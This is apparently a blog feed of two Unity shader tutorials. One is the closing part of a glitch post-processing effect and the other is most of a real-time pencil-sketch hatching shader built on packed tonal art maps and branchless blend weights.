<span class="k">return</span> <span class="nf">frac</span><span class="p">(</span><span class="nf">sin</span><span class="p">(</span><span class="nf">dot</span><span class="p">(</span><span class="n">co</span><span class="p">.</span><span class="n">xy</span><span class="p">,</span> <span class="nf">float2</span><span class="p">(</span><span class="m">12.9898</span><span class="p">,</span> <span class="m">78.233</span><span class="p">)))</span> <span class="p">*</span> <span class="m">43758.5453</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed2</span> <span class="n">glitch</span> <span class="p">=</span> <span class="p">(</span><span class="nf">tex2D</span><span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">)).</span><span class="n">rg</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">r</span> <span class="p">=</span> <span class="p">(</span><span class="nf">rand</span><span class="p">(</span><span class="nf">float2</span><span class="p">(</span><span class="n">glitch</span><span class="p">.</span><span class="n">r</span><span class="p">,</span> <span class="n">_GlitchRandom</span><span class="p">)));</span>
<span class="kt">float</span> <span class="n">gFlag</span> <span class="p">=</span> <span class="nf">max</span><span class="p">(</span><span class="m">0.0</span><span class="p">,</span> <span class="nf">ceil</span><span class="p">(</span><span class="n">_GlitchAmount</span> <span class="p">-</span> <span class="n">r</span><span class="p">));</span>
<span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span> <span class="p">*</span> <span class="n">gFlag</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="nf">frac</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">+</span> <span class="n">uvShift</span><span class="p">));</span>
<span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>And in c#, we have to add a line to our update() function:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">void</span> <span class="nf">Update</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">glitchAmount</span> <span class="p">=</span> <span class="n">Mathf</span><span class="p">.</span><span class="nf">Clamp</span><span class="p">(</span><span class="n">glitchAmount</span><span class="p">,</span> <span class="m">0.0f</span><span class="p">,</span> <span class="m">1.0f</span><span class="p">);</span>
<span class="n">_glitchMat</span><span class="p">.</span><span class="nf">SetFloat</span><span class="p">(</span><span class="s">"_GlitchRandom"</span><span class="p">,</span> <span class="n">Random</span><span class="p">.</span><span class="nf">Range</span><span class="p">(-</span><span class="m">1.0f</span><span class="p">,</span> <span class="m">1.0f</span><span class="p">));</span>
<span class="n">_glitchMat</span><span class="p">.</span><span class="nf">SetFloat</span><span class="p">(</span><span class="s">"_GlitchAmount"</span><span class="p">,</span> <span class="n">glitchAmount</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>If you set your _GlitchAmount to 0.2 and run this now it looks something like this:</p>
<div align="center">
<img src="/images/post_images/2017-03-13/fast.gif" /><br />
</div>
<p>Which is much better, but a little bit too spastic for my liking. I ended up putting my _GlitchRandom setter inside another function that I called using Invoke, so that I could control how often I wanted my effect to update:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">void</span> <span class="nf">Start</span> <span class="p">()</span>
<span class="p">{</span>
<span class="n">_glitchShader</span> <span class="p">=</span> <span class="n">Shader</span><span class="p">.</span><span class="nf">Find</span><span class="p">(</span><span class="s">"Hidden/GlitchFX/GlitchFX_Shift"</span><span class="p">);</span>
<span class="n">_glitchMat</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Material</span><span class="p">(</span><span class="n">_glitchShader</span><span class="p">);</span>
<span class="n">_glitchMat</span><span class="p">.</span><span class="nf">SetTexture</span><span class="p">(</span><span class="s">"_GlitchMap"</span><span class="p">,</span> <span class="n">blockTexture</span><span class="p">);</span>
<span class="nf">Invoke</span><span class="p">(</span><span class="s">"UpdateRandom"</span><span class="p">,</span> <span class="m">0.25f</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">void</span> <span class="nf">UpdateRandom</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">_glitchMat</span><span class="p">.</span><span class="nf">SetFloat</span><span class="p">(</span><span class="s">"_GlitchRandom"</span><span class="p">,</span> <span class="n">Random</span><span class="p">.</span><span class="nf">Range</span><span class="p">(-</span><span class="m">1.0f</span><span class="p">,</span> <span class="m">1.0f</span><span class="p">));</span>
<span class="nf">Invoke</span><span class="p">(</span><span class="s">"UpdateRandom"</span><span class="p">,</span> <span class="n">Random</span><span class="p">.</span><span class="nf">Range</span><span class="p">(</span><span class="m">0.01f</span><span class="p">,</span> <span class="m">0.15f</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
<p>It’s a little change, but it makes a big difference!</p>
<div align="center">
<img src="/images/post_images/2017-03-13/slow2.gif" /><br />
</div>
<h2 id="adding-new-sample-directions">Adding New Sample Directions</h2>
<p>We have two final problems to solve:</p>
<ul>
<li>when the effect is set to 1.0, the screen still ends up with a static looking glitch effect</li>
<li>all our texture lookups are going in the same direction, since we’re using a gray value as our offset</li>
</ul>
<p>Thankfully both are pretty easy to solve. To fix the first one, all I’m going to do is multiply the UV offset by the random value for the block. This way, even when the entire screen is glitching, when _GlitchRandom updates, every block will use different UV coordinates, making it much less uniform.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">rg</span> <span class="p">*</span> <span class="n">gFlag</span> <span class="p">*</span> <span class="n">r</span><span class="p">;</span></code></pre></figure>
<p>And secondly, we’re finally going to use that coloured noise map I showed you at the very beginning! Until now, we’ve been using the rg components of the noise texture as a cheap way to get a uv offset. Now we’re going to change to using the coloured map, and use the green and blue components for this vector:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed3</span> <span class="n">glitch</span> <span class="p">=</span> <span class="p">(</span><span class="nf">tex2D</span><span class="p">(</span><span class="n">_GlitchMap</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">)).</span><span class="n">rgb</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">r</span> <span class="p">=</span> <span class="p">(</span><span class="nf">rand</span><span class="p">(</span><span class="nf">float2</span><span class="p">(</span><span class="n">glitch</span><span class="p">.</span><span class="n">r</span><span class="p">,</span> <span class="n">_GlitchRandom</span><span class="p">)));</span>
<span class="kt">float</span> <span class="n">gFlag</span> <span class="p">=</span> <span class="nf">max</span><span class="p">(</span><span class="m">0.0</span><span class="p">,</span> <span class="nf">ceil</span><span class="p">(</span><span class="n">_GlitchAmount</span><span class="p">-</span><span class="n">r</span><span class="p">));</span>
<span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="n">glitch</span><span class="p">.</span><span class="n">gb</span> <span class="p">*</span> <span class="n">gFlag</span><span class="p">;</span>
<span class="n">fixed4</span> <span class="n">col</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="nf">frac</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">uv</span> <span class="p">+</span> <span class="n">uvShift</span><span class="p">));</span>
<span class="k">return</span> <span class="n">col</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>This is better, but since the .gb channels will always have positive values, our texture lookups still only in 2 directions: positive in both axes. To fix this, we need to stretch the range of these channels so that 0.5 becomes our new 0, and values lower than 0.5 become negative. This just takes a quick multiply and subtract:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">float2</span> <span class="n">uvShift</span> <span class="p">=</span> <span class="p">(</span><span class="n">glitch</span><span class="p">.</span><span class="n">gb</span> <span class="p">*</span> <span class="m">2.0</span> <span class="p">-</span> <span class="m">1.0</span><span class="p">)</span> <span class="p">*</span> <span class="n">gFlag</span><span class="p">;</span></code></pre></figure>
<p>If you run this now, you’re going to get exactly the effect that was shown at the start of the article!</p>
<h2 id="wrap-up">Wrap Up</h2>
<p>As usual, all of the code I talked about here is available <a href="https://github.com/khalladay/GlitchFX">on github</a>, feel free to grab that and use it however you want!</p>
<p>Let’s end by talking about performance, and some ways you could extend this effect.</p>
<p>From a performance standpoint, this is a remarkably light effect. Even though we’re introducing a dependent texture read on a full resolution screen buffer, my iPhone 6 barely noticed this thing running, taking around 0.2 ms to render it. One thing to keep in mind with this effect is that the cost is the same whether you’re glitching the whole screen, or not glitching anything, so if you have this in a project, it might be worth adding some logic on the c# side to disable the effect when _GlitchAmount is set to 0.</p>
<p>Finally, there are LOTS of ways you can extend this effect! You could hue shift the glitched blocks, tint them colours, you could add chromatic aberration to the glitched blocks, or use a noise texture to add weird artifacts over them. The sky is really the limit here. If you want some inspiration, take a look at the page the <a href="http://www.digieffects.com/products/damage">DigiEffects Damage AfterEffects Package</a>. Glitch effects are really fun because there’s so much you can do with them since you’re not trying to make things look “correct,” which is probably why so many people like making glitch art.</p>
<p>That’s it for now! As usual, if you have questions, or want to say hi, or see something I got wrong, please send me a message <a href="https://twitter.com/khalladay">on Twitter</a>! Have a good one!</p>
A Pencil Sketch Effect2017-02-21T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2017/02/21/Pencil-Sketch-Effect<p>There are a handful of effects that have kicked around in my brain for awhile in a nebulous “one day, I want to build that” sort of way. Some of these include using genetic algorithms to turn images into triangles (like <a href="https://rogerjohansson.blog/2008/12/11/genetic-gallery/">here</a>), Portals, Procedural Clouds, and the one I decided to build this weekend: Real Time Hatching (or something like it)!</p>
<div align="center">
<img src="/images/post_images/2017-02-19/smallerest.gif" /><br />
</div>
<p>Real Time Hatching is the fancy (and much more concise) way of describing the class of rendering effects that make scenes look like they were drawn (or at least shaded) by hand. The effect is actually reasonably simple, but it’s pretty fun and provides a few good excuses to talk about fixed/half/float precision.</p>
<p>I’m going to present the basic effect as it would look if you wanted to write a shader to attach to a single object, how to turn that into a post effect that will work on the whole screen, and take a few detours in the process. All the code here is going to be for Unity 5.5, so your mileage may vary if you’re using a different version.</p>
<h2 id="tonal-art-maps">Tonal Art Maps</h2>
<p>Before we do anything though, we need to talk about the basic theory behind real time hatching. The whole effect is based on the concept of Tonal Art Maps (or TAMs). These are a series of textures which correspond to how you want your art to like at different lighting intensities. The tricky part about them is that in order for things to look right, each texture needs to contain all the information stored in all the maps which correspond to brighter tones within them. So your second brightest map needs to contain all the texture data of your brightest, plus the additional data that makes this map darker.</p>
<p>This is sorta complicated when stated in words, but it’s a lot more intuitive when you see the textures. The following was taken from a widely cited research paper (located <a href="http://hhoppe.com/hatching.pdf">here</a> which presented the technique we’re going to use today.</p>
<div align="center">
<img src="/images/post_images/2017-02-19/tamimages.PNG" /><br />
</div>
<p>As you can see, each map represents pencil strokes that an artist would make to shade in a part of a piece of paper. The darker maps contain all the pencil strokes from the brighter regions, and then add more. If you don’t follow this rule when creating your maps, the strokes won’t nicely flow into each other, and you’ll end up with very weird looking line shading.</p>
<p>In order for us to have a “proper” TAM, we need to go a step further than simply authoring our hatching textures according to the above rules, we also need to provide custom mips. If you don’t, then as your objects get farther away, you’re going to see less and less stroke detail on them. The paper goes into detail as to how they generated the custom mips, and provides an example of what they made:</p>
<div align="center">
<img src="/images/post_images/2017-02-19/tammips.PNG" />
<font size="2"><i>from http://hhoppe.com/hatching.pdf</i></font><br /><br />
</div>
<p>I’m actually going to skip all of this custom mip texture generation stuff, because I don’t feel like creating my own TAM generator, given that my interest in this effect was really just in figuring out how it worked, not using it for a commercial product. Suffice to say, I’m sure it would look better if you spend the time to create the custom mips. If you want to get a look at a working TAM generator, I found one written in processing <a href="https://sites.google.com/site/cs7490finalrealtimehatching/">here</a></p>
<p>Ok, that was a lot of writing for not a lot of output, but now that we have our TAM images, we can proceed with actually creating the effect.</p>
<h2 id="a-single-object-shader">A Single Object Shader</h2>
<p>So now that we have our TAM, we need to create a shader that uses them. The paper that I cited earlier presents a method for applying a set of TAMs to an object using 6 texture lookups, because (importantly), you could pack those 6 lookups into two texture accesses. This is an important thing to dwell on for a second, because it gets missed a lot of the time when people post real time hatching shaders: DO NOT add 6 texture lookups to your shader for hatching. Pack the textures into the channels of 2 RGB textures instead.</p>
<p>To pack the TAM textures together, I wrote a quick and dirty Unity tool. The code is a bit long to paste here, but it’s available on the github repo linked at the end of the post, or in the gist <a href="https://gist.github.com/khalladay/e017625b018531e579905369f1011c08">here</a>.</p>
<p>I used that tool to combine the above 6 TAM images into the following:</p>
<div align="center">
<img src="/images/post_images/2017-02-19/packedhatch.png" /><br />
</div>
<p>Which is much more space efficient! Now we need to look at how the shader is going to work.</p>
<p>Obviously we’re going to be blending between the 6 channels in our two textures, but how we do it is pretty nifty. Before we get started though, let’s get the basic skeleton of our shader out of the way. Remember that for now, we’re going to be writing a shader that we can apply to a single object. Here’s the setup:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_MainTex_ST</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_Hatch0</span><span class="p">;</span>
<span class="n">sampler2D</span> <span class="n">_Hatch1</span><span class="p">;</span>
<span class="n">float4</span> <span class="n">_LightColor0</span><span class="p">;</span>
<span class="n">v2f</span> <span class="nf">vert</span> <span class="p">(</span><span class="n">appdata</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">v2f</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">vertex</span> <span class="p">=</span> <span class="nf">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="p">=</span> <span class="n">v</span><span class="p">.</span><span class="n">uv</span> <span class="p">*</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">xy</span> <span class="p">+</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">zw</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">nrm</span> <span class="p">=</span> <span class="nf">mul</span><span class="p">(</span><span class="nf">float4</span><span class="p">(</span><span class="n">v</span><span class="p">.</span><span class="n">norm</span><span class="p">,</span> <span class="m">0.0</span><span class="p">),</span> <span class="n">unity_WorldToObject</span><span class="p">).</span><span class="n">xyz</span><span class="p">;</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">fixed4</span> <span class="nf">frag</span> <span class="p">(</span><span class="n">v2f</span> <span class="n">i</span><span class="p">)</span> <span class="p">:</span> <span class="n">SV_Target</span>
<span class="p">{</span>
<span class="n">fixed4</span> <span class="n">color</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">);</span>
<span class="n">half3</span> <span class="n">diffuse</span> <span class="p">=</span> <span class="n">color</span><span class="p">.</span><span class="n">rgb</span> <span class="p">*</span> <span class="n">_LightColor0</span><span class="p">.</span><span class="n">rgb</span> <span class="p">*</span> <span class="nf">dot</span><span class="p">(</span><span class="n">_WorldSpaceLightPos0</span><span class="p">,</span> <span class="nf">normalize</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">nrm</span><span class="p">));</span>
<span class="c1">//hatching logic goes here</span>
<span class="k">return</span> <span class="n">color</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>The complete source for the effect is available on github <a href="https://github.com/khalladay/PencilSketchEffect">here</a>, but hopefully the above is enough to get us all on the same page. All we have here is a standard diffuse shader. While you will likely need more than a single directional light in a real project, the hatching logic works well with any light input, so I’m going with a simple case here.</p>
<p>The first thing we need to do is to get a scalar representation of how bright our fragment is with all the lighting applied. This just requires a dot product against a vector constant (0.2326, 0.7152, 0.0722).</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">half</span> <span class="n">intensity</span> <span class="p">=</span> <span class="nf">dot</span><span class="p">(</span><span class="n">diffuse</span><span class="p">,</span> <span class="nf">half3</span><span class="p">(</span><span class="m">0.2326</span><span class="p">,</span> <span class="m">0.7152</span><span class="p">,</span> <span class="m">0.0722</span><span class="p">));</span></code></pre></figure>
<p>This constant comes from the <a href="https://en.wikipedia.org/wiki/Luminosity_function">luminosity function</a>, and in theory requires that the colour we’re multiply it against has been converted to linear space. Depending on what platform you’re on, you may or may not care about this. For simplicity I’m going to omit it, just be aware that light most lighting calculations, if you aren’t working with linear colour, you’re sacrificing correctness in favor of performance.</p>
<p>Also note that we’re calculating this value in halfs. While you likely wouldn’t see too much of a difference with a fixed precision variable, an 11 bit fixed precision variable is only accurate to about 0.0039 (or 1/256), and the luminosity constant we’re using requires more precision to accurately represent. If you’re splitting hairs, you can’t store 0.7152 completely correctly in a half either, but it’s off by much, much less (if you’re interested, more info on half precision vars can be found <a href="http://www.codersnotes.com/notes/wrangling-halfs/">here</a>).</p>
<p>If we add that line to our shader, and output the result, we’ll end up with a nice grayscale effect:</p>
<div align="center">
<img src="/images/post_images/2017-02-19/grayscale.PNG" style="width:300px; height:300px" /><br />
</div>
<p>Now all we need to do is to convert that scalar intensity value into a hatch texture sample. We have 6 hatch channels, which means that there are going to be 6 different intensity values that will map to a sample from only 1 hatch texture (1/6, 2/6, 3/6, 4/6, 5/6, 6/6). Any value that isn’t one of these exact values is going to require us to blend between the two textures that our value is between. This means that an intensity value of 1.5 / 6 (or 0.25) will require us to blend between the texture that corresponds to 1/6 and 2/6. This is demonstrated in the diagram below.</p>
<div align="center">
<img src="/images/post_images/2017-02-19/hatchblend.png" /><br />
</div>
<p>Unfortunately for us, GPUs (or at least, mobile GPUs) aren’t great at branching logic. So while it seems straightforward to write this with a few if statements like so:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed3</span> <span class="n">rgb</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">intensity</span> <span class="p">></span> <span class="m">1.0</span> <span class="p">&&</span> <span class="n">intensity</span> <span class="p"><</span> <span class="m">2.0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">fixed3</span> <span class="n">hatch</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">hatch0</span><span class="p">,</span> <span class="n">uv</span><span class="p">);</span>
<span class="n">rgb</span> <span class="p">+=</span> <span class="n">hatch</span><span class="p">.</span><span class="n">r</span> <span class="p">*</span> <span class="p">(</span><span class="m">1.0</span> <span class="p">-</span> <span class="n">intensity</span><span class="p">);</span>
<span class="n">rgb</span> <span class="p">+=</span> <span class="n">hatch</span><span class="p">.</span><span class="n">g</span> <span class="p">*</span> <span class="n">intensity</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">intensity</span> <span class="p">==</span> <span class="m">2.0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">rgb</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">hatch</span><span class="p">,</span> <span class="n">uv</span><span class="p">).</span><span class="n">g</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">...</span></code></pre></figure>
<p>We really, really, don’t want to do that in our shader, since it would mean a big unnecessary performance penalty. Instead, what we want is to write something that looks like this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">fixed3</span> <span class="n">rgb</span><span class="p">;</span>
<span class="n">fixed3</span> <span class="n">hatch</span> <span class="p">=</span> <span class="nf">tex2D</span><span class="p">(</span><span class="n">hatch0</span><span class="p">,</span> <span class="n">uv</span><span class="p">);</span>
<span class="n">rgb</span> <span class="p">+=</span> <span class="n">hatch</span><span class="p">.</span><span class="n">r</span> <span class="p">*</span> <span class="n">weight0</span><span class="p">;</span>
<span class="n">rgb</span> <span class="p">+=</span> <span class="n">hatch</span><span class="p">,</span><span class="n">g</span> <span class="p">*</span> <span class="n">weight1</span><span class="p">;</span>
<span class="n">rgb</span> <span class="p">+=</span> <span class="n">hatch</span><span class="p">.</span><span class="n">b</span> <span class="p">*</span> <span class="n">weight2</span><span class="p">;</span>
<span class="p">...</span></code></pre></figure>
<p>Notice how in both cases we end up doing the same number of texture samples, but the second case contains no branching at all. What we need to do is calculate the weights we multiply by so that we only take data from the hatch textures we want to use. It would also be nice if those weights could be created such that the sum of the weights for the textures we want added up to 1, while the weights for the other hatch samples stayed at 0.</p>
<p>Let’s look at how to do this. Again, we have 6 textures that we need to calculate weights for, so it stands to reason that we’re going to need to compare our intensity value against 6 numbers to determine these weights. We are going to store the difference between our intensity and each of these comparing values in 2 half3s. It’s going to look like this:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">half</span> <span class="n">i</span> <span class="p">=</span> <span class="n">intensity</span> <span class="p">*</span> <span class="m">6</span><span class="p">;</span>
<span class="n">half3</span> <span class="n">intensity3</span> <span class="p">=</span> <span class="nf">half3</span><span class="p">(</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">);</span>
<span class="n">half3</span> <span class="n">weights0</span> <span class="p">=</span> <span class="n">intensity3</span> <span class="p">-</span> <span class="nf">half3</span><span class="p">(</span><span class="m">0</span><span class="p">,</span><span class="m">1</span><span class="p">,</span><span class="m">2</span><span class="p">);</span>
<span class="n">half3</span> <span class="n">weights1</span> <span class="p">=</span> <span class="n">intensity3</span> <span class="p">-</span> <span class="nf">half3</span><span class="p">(</span><span class="m">3</span><span class="p">,</span><span class="m">4</span><span class="p">,</span><span class="m">5</span><span class="p">);</span></code></pre></figure>
<p>There’s a few things to talk about in the above snippet. First of all, why am I using integer steps instead of decimal 1/6 steps? This is to avoid multiple divisons by 6 later on. We know that at most, we’re going to have 2 weights which are non zero, and those two weights need to add up to 1, so as long as the step between each weight is 1, we can simply lerp between them and get our final answer. Note that for this to work, we also need to multiply our intensity value by 6.</p>
<p>Let’s step through the above with a sample intensity value of 0.75</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">half</span> <span class="n">i</span> <span class="p">=</span> <span class="m">0.75</span> <span class="p">*</span> <span class="m">6</span><span class="p">;</span> <span class="c1">// 4.5</span>
<span class="n">half3</span> <span class="n">intensity3</span> <span class="p">=</span> <span class="nf">half3</span><span class="p">(</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">);</span> <span class="c1">//(4.5,4.5,4.5)</span>
<span class="n">half3</span> <span class="n">weights0</span> <span class="p">=</span> <span class="n">intensity3</span> <span class="p">-</span> <span class="nf">half3</span><span class="p">(</span><span class="m">0</span><span class="p">,</span><span class="m">1</span><span class="p">,</span><span class="m">2</span><span class="p">);</span> <span class="c1">//(4.5,3.1,2.5)</span>
<span class="n">half3</span> <span class="n">weights1</span> <span class="p">=</span> <span class="n">intensity3</span> <span class="p">-</span> <span class="nf">half3</span><span class="p">(</span><span class="m">3</span><span class="p">,</span><span class="m">4</span><span class="p">,</span><span class="m">5</span><span class="p">);</span> <span class="c1">//(1.5,0.5,-0.5)</span></code></pre></figure>
<p>Gross, we have some weight values that are outside of our 0-1 range, that’s not going to do us any favours later on, so let’s wrap our math in saturate calls and try that again.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">half</span> <span class="n">i</span> <span class="p">=</span> <span class="m">0.75</span> <span class="p">*</span> <span class="m">6</span><span class="p">;</span> <span class="c1">// 4.5</span>
<span class="n">half3</span> <span class="n">intensity3</span> <span class="p">=</span> <span class="nf">half3</span><span class="p">(</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">,</span><span class="n">i</span><span class="p">);</span> <span class="c1">//(4.5,4.5,4.5)</span>
<span class="n">half3</span> <span class="n">weights0</span> <span class="p">=</span> <span class="nf">saturate</span><span class="p">(</span><span class="n">intensity3</span> <span class="p">-</span> <span class="nf">half3</span><span class="p">(</span><span class="m">0</span><span class="p">,</span><span class="m">1</span><span class="p">,</span><span class="m">2</span><span class="p">));</span>
<span class="c1">// weights0 = (1,1,1)</span>
<span class="n">half3</span> <span class="n">weights1</span> <span class="p">=</span> <span class="nf">saturate</span><span class="p">(</span><span class="n">intensity3</span> <span class="p">-</span> <span class="nf">half3</span><span class="p">(</span><span class="m">3</span><span class="p">,</span><span class="m">4</span><span class="p">,</span><span class="m">5</span><span class="p">));</span>
<span class="c1">//weights1 = (1,0.5,0)</span></code></pre></figure>
<p>Ok, that’s more useful! Kinda, there’s still a few things to take care of here. For one, we said we needed a maximum of 2 non zero weights, and we have 5 right now. What we need to do is get rid of the weights for our lower values, so that the only ones remaining are for the two textures we actually want. We also want those two remaining weights to add up to 1.</p>
<p>Luckily all it takes is a bit of subtraction to fix everything up:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">weights0</span><span class="p">.</span><span class="n">xy</span> <span class="p">-=</span> <span class="n">weights0</span><span class="p">.</span><span class="n">yz</span><span class="p">;</span>
<span class="n">weights0</span><span class="p">.</span><span class="n">z</span> <span class="p">-=</span> <span class="n">weights1</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="n">weights1</span><span class="p">.</span><span class="n">xy</span> <span class="p">-=</span> <span class="n">weights1</span><span class="p">.</span><span class="n">yz</span><span class="p">;</span></code></pre></figure>
<p>Nifty right? Using our example value of 0.75, this would give us two weight vectors: (0,0,0) and (0.5, 0.5, 0.0), which means that an input of 4.5 is a 50% blend of our 4th and 5th texture samples, which is exactly what we want to do!</p>
<p>So now that we have our weights, the rest is just some Multiply/Add operations:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">half3</span> <span class="n">hatching</span> <span class="p">=</span> <span class="nf">half3</span><span class="p">(</span><span class="m">0.0</span><span class="p">,</span> <span class="m">0.0</span><span class="p">,</span> <span class="m">0.0</span><span class="p">);</span>
<span class="n">hatching</span> <span class="p">+=</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">r</span> <span class="p">*</span> <span class="n">weightsA</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="n">hatching</span> <span class="p">+=</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">g</span> <span class="p">*</span> <span class="n">weightsA</span><span class="p">.</span><span class="n">y</span><span class="p">;</span>
<span class="n">hatching</span> <span class="p">+=</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">b</span> <span class="p">*</span> <span class="n">weightsA</span><span class="p">.</span><span class="n">z</span><span class="p">;</span>
<span class="n">hatching</span> <span class="p">+=</span> <span class="n">hatch1</span><span class="p">.</span><span class="n">r</span> <span class="p">*</span> <span class="n">weightsB</span><span class="p">.</span><span class="n">x</span><span class="p">;</span>
<span class="n">hatching</span> <span class="p">+=</span> <span class="n">hatch1</span><span class="p">.</span><span class="n">g</span> <span class="p">*</span> <span class="n">weightsB</span><span class="p">.</span><span class="n">y</span><span class="p">;</span>
<span class="n">hatching</span> <span class="p">+=</span> <span class="n">hatch1</span><span class="p">.</span><span class="n">b</span> <span class="p">*</span> <span class="n">weightsB</span><span class="p">.</span><span class="n">z</span><span class="p">;</span></code></pre></figure>
<p>Which we can further optimize by vectorizing the multiplications before we add things together:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="n">half3</span> <span class="n">hatching</span> <span class="p">=</span> <span class="nf">half3</span><span class="p">(</span><span class="m">0.0</span><span class="p">,</span> <span class="m">0.0</span><span class="p">,</span> <span class="m">0.0</span><span class="p">);</span>
<span class="n">hatch0</span> <span class="p">=</span> <span class="n">hatch0</span> <span class="p">*</span> <span class="n">weightsA</span><span class="p">;</span>
<span class="n">hatch1</span> <span class="p">=</span> <span class="n">hatch1</span> <span class="p">*</span> <span class="n">weightsB</span><span class="p">;</span>
<span class="n">half3</span> <span class="n">hatching</span> <span class="p">=</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">r</span> <span class="p">+</span>
<span class="n">hatch0</span><span class="p">.</span><span class="n">g</span> <span class="p">+</span> <span class="n">hatch0</span><span class="p">.</span><span class="n">b</span> <span class="p">+</span>
<span class="n">hatch1</span><span class="p">.</span><span class="n">r</span> <span class="p">+</span> <span class="n">hatch1</span><span class="p">.</span><span class="n">g</span> <span class="p">+</span>
<span class="n">hatch1</span><span class="p">.</span><span class="n">b</span><span class="p">;</span></code></pre></figure>
<p>There are two things to note in the above. The first is how we’re handling black. Because our effect relies on keeping the relationship of less light == denser pencil strokes, we can’t treat black as a separate texture sample, because when we move between our darkest texture and pure black we won’t be adding any more strokes. Instead, when we’re blending between our darkest two texture samples, what we’re really doing is (darkestTexture * 1.0 - i) + (2ndDarkest * i). This is expressed above but it isn’t immmediately obvious.</p>
<p>Second, you may have realized that the above all relies on a very big assumption: that our intensity will never exceed 1.0. Of course this is nonsense, but assuming it up until now has both made our math easier, and given us a fun hack to let us go to pure white when being lit very brightly. At the beginning of our math, we just need to store max(0, intensity - 1.0), and add it back at the end. For values less than 1.0, this is going to be zero and for anything super bright, it’s going to push us into pure white territory.</p>
